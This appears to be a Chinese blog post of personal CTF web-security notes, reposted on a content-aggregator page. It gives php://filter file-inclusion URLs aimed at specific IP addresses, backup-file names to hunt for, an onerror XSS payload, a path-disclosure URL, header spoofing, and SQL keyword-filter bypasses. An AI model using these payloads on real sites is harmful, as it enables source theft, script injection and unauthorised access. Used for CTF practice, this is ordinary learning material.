web杂记
来源:互联网 发布:电脑报 淘宝 编辑:程序博客网 时间:2024/06/06 10:39
虽然是个web渣渣,不过还是记下一些小知识吧!
找源码:
1. 利用PHP协议读取所有源码 ,不太懂原理
http://218.76.35.75:20115/?page=php://filter/read=convert.base64-encode/resource=main
上面这个是看main.php的源码,得到的是base64形式,可以换成index看看;
http://218.76.35.74:20129/include.php?file=php://filter/read=convert.base64-encode/resource=include
这是看include.php的源码
2. 备份文件index.php~,.index.php.swp, index.php.swp, index.php.bak。其中还原命令为
vim -r index.phpXSS:
1.onerror:
> 123' onerror=alert(document.domain)robots.txt可以看到一些东西
爆路径:
/file_manager_json.php?path=/
访问页面时
修改来自的网址——改Referer头
修改ip——改/增 X-forwarded-for头
sql注入:
关键字被过滤——
andand
/*and*/
/*!and*/
阅读全文
0 0
- web杂记
- WEB 杂记
- web杂记
- web杂记
- Java-Web应用杂记
- 学习Web Service杂记
- web php 杂记
- web前端杂记
- java web 学习杂记
- 杂记ant Java web Start
- web前端动效杂记
- Web工作杂记(一)
- web管理后台程序开发的杂记
- [近日杂记] WEB 与手机应用
- WEB服务器应用开发每天杂记
- Web.config杂记(随时更新)
- web 杂记(input(checked) layer.confirm)
- 杂记
- dell r730 xd 安装vmware esxi 5.5 u1
- HTML菜鸟学习心得-笔记1
- Tomcat配置问题
- C/C++ 指向字符的指针为什么可以用字符串来初始化,而不是字符地址。
- 深入研究Spring-IoC:两种设计和实现
- web杂记
- angularjs 瀑布流
- Webservice xml解析
- 斯坦福大学公开课机器学习课程(Andrew Ng)十特征选择
- Java_反射(Class文件对象 / 反射 / 动态代理)
- poj 1180 Batch Scheduling dp斜率优化
- Python三大器之生成器
- HTML地理定位
- elasticsearch之javaAPI简单操作增删改、批量处理(一)
